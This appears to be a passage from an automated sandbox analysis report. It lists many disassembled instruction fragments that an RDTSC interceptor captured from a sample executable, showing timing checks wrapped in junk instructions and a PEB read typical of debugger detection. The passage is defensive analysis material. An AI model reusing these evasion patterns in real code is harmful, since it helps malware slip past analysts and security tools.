Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7F9A4 second address: A7F9B3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B3A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FB03 second address: A7FB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86A3F second address: A86A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF7D4C1B3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86A49 second address: A86A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF7D4C1B430h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86A6B second address: A86A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A863CC second address: A863E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7D4C1B426h 0x00000008 jmp 00007FF7D4C1B42Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A863E8 second address: A863EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A863EE second address: A863F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A863F3 second address: A86405 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnp 00007FF7D4C1B3A6h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86405 second address: A8643C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B431h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 jno 00007FF7D4C1B436h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A944BD second address: A944C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A944C1 second address: A944C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A944C7 second address: A944D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF7D4C1B3A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A944D9 second address: A944F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94325 second address: A94330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94330 second address: A9433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF7D4C1B426h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9433B second address: A94345 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7D4C1B3B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94345 second address: A94357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7D4C1B426h 0x0000000a je 00007FF7D4C1B42Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D5CE second address: A9D5D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7D4C1B3ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D5D8 second address: A9D5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF7D4C1B42Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA95FB second address: AA9618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7D4C1B3B1h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7A6 second address: AAF7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7D4C1B426h 0x0000000a popad 0x0000000b jno 00007FF7D4C1B43Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE017 second address: AAE01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE01B second address: AAE01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE01F second address: AAE029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE029 second address: AAE062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B439h 0x00000009 jmp 00007FF7D4C1B436h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE062 second address: AAE078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF7D4C1B3AEh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE208 second address: AAE222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B434h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE222 second address: AAE226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE4DD second address: AAE4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE4E3 second address: AAE4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE4E7 second address: AAE50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jne 00007FF7D4C1B442h 0x0000000d pushad 0x0000000e js 00007FF7D4C1B426h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jc 00007FF7D4C1B426h 0x0000001e popad 0x0000001f push esi 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE62E second address: AAE640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE640 second address: AAE644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE644 second address: AAE678 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF7D4C1B3ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007FF7D4C1B3B5h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE678 second address: AAE67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE828 second address: AAE82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE82E second address: AAE834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE834 second address: AAE841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FF7D4C1B3B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE960 second address: AAE964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE964 second address: AAE99C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B0h 0x00000007 jmp 00007FF7D4C1B3B2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FF7D4C1B3AEh 0x00000014 pushad 0x00000015 popad 0x00000016 ja 00007FF7D4C1B3A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE99C second address: AAE9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB3E94 second address: AB3E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB3E9E second address: AB3EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4018 second address: AB401E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB401E second address: AB4026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF12D7 second address: AF12FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7D4C1B3A6h 0x0000000a jmp 00007FF7D4C1B3B8h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF12FA second address: AF1300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1300 second address: AF1306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1306 second address: AF130A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF130A second address: AF1332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7D4C1B3B7h 0x0000000c ja 00007FF7D4C1B3A6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B00C53 second address: B00C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B00C6D second address: B00C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF7D4C1B3B9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03099 second address: B0309D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0309D second address: B030F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3B8h 0x00000007 jmp 00007FF7D4C1B3B0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF7D4C1B3B1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FF7D4C1B3B2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87A4 second address: BC87A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87A8 second address: BC87AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87AE second address: BC87B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87B8 second address: BC87C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87C6 second address: BC87CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC87CB second address: BC87D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC782E second address: BC7834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC7C2C second address: BC7C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B3B7h 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007FF7D4C1B3AEh 0x00000010 pop edx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a jmp 00007FF7D4C1B3ABh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC7F30 second address: BC7F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC7F36 second address: BC7F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FF7D4C1B3C7h 0x0000000e jmp 00007FF7D4C1B3B0h 0x00000013 jmp 00007FF7D4C1B3B1h 0x00000018 jl 00007FF7D4C1B3AAh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC7F6F second address: BC7F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF7D4C1B426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC7F79 second address: BC7F83 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7D4C1B3A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC821D second address: BC8223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC8544 second address: BC854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC9E76 second address: BC9E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB3EC second address: BCB3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCB3F0 second address: BCB3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCDCFA second address: BCDCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCE2BD second address: BCE317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF7D4C1B428h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jnl 00007FF7D4C1B434h 0x00000017 jmp 00007FF7D4C1B434h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 pushad 0x00000022 jmp 00007FF7D4C1B42Ah 0x00000027 push esi 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a pop esi 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 jnl 00007FF7D4C1B428h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCFA25 second address: BCFA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCFA2B second address: BCFA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7D4C1B437h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCFA47 second address: BCFA58 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7D4C1B3ACh 0x00000008 js 00007FF7D4C1B3A6h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCFA58 second address: BCFA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCFA5E second address: BCFA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0033 second address: 6EB0039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0039 second address: 6EB003D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB003D second address: 6EB0091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f jmp 00007FF7D4C1B434h 0x00000014 call 00007FF7D4C1B432h 0x00000019 mov eax, 5FEEF611h 0x0000001e pop esi 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push ecx 0x00000026 pop edi 0x00000027 mov ah, 85h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0091 second address: 6EB00AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B3ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB00AB second address: 6EB010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 sub esp, 18h 0x00000009 pushad 0x0000000a mov bx, DF86h 0x0000000e call 00007FF7D4C1B437h 0x00000013 pushfd 0x00000014 jmp 00007FF7D4C1B438h 0x00000019 adc ch, 00000058h 0x0000001c jmp 00007FF7D4C1B42Bh 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 push esi 0x00000025 pushad 0x00000026 mov bl, al 0x00000028 movsx ebx, ax 0x0000002b popad 0x0000002c mov dword ptr [esp], ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ebx, esi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB010A second address: 6EB013D instructions: 0x00000000 rdtsc 0x00000002 mov si, 25CDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov si, 51C9h 0x0000000c popad 0x0000000d mov ebx, dword ptr [eax+10h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FF7D4C1B3B0h 0x00000019 sub cl, 00000018h 0x0000001c jmp 00007FF7D4C1B3ABh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB013D second address: 6EB015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ebx, esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB015D second address: 6EB0182 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007FF7D4C1B3B6h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0182 second address: 6EB0188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB0188 second address: 6EB019E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7D4C1B3B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EB019E second address: 6EB0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7D4C1B42Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007FF7D4C1B431h 0x00000016 and esi, 6D7EDFD6h 0x0000001c jmp 00007FF7D4C1B431h 0x00000021 popfd 0x00000022 popad 0x00000023 mov esi, dword ptr [74E806ECh] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FF7D4C1B42Ch 0x00000030 adc ah, FFFFFFF8h 0x00000033 jmp 00007FF7D4C1B42Bh 0x00000038 popfd 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FF7D4C1B436h 0x00000040 sbb cl, 00000058h 0x00000043 jmp 00007FF7D4C1B42Bh 0x00000048 popfd 0x00000049 jmp 00007FF7D4C1B438h 0x0000004e popad 0x0000004f popad 0x00000050 test esi, esi 0x00000052 jmp 00007FF7D4C1B430h 0x00000057 jne 00007FF7D4C1C287h 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 mov edi, 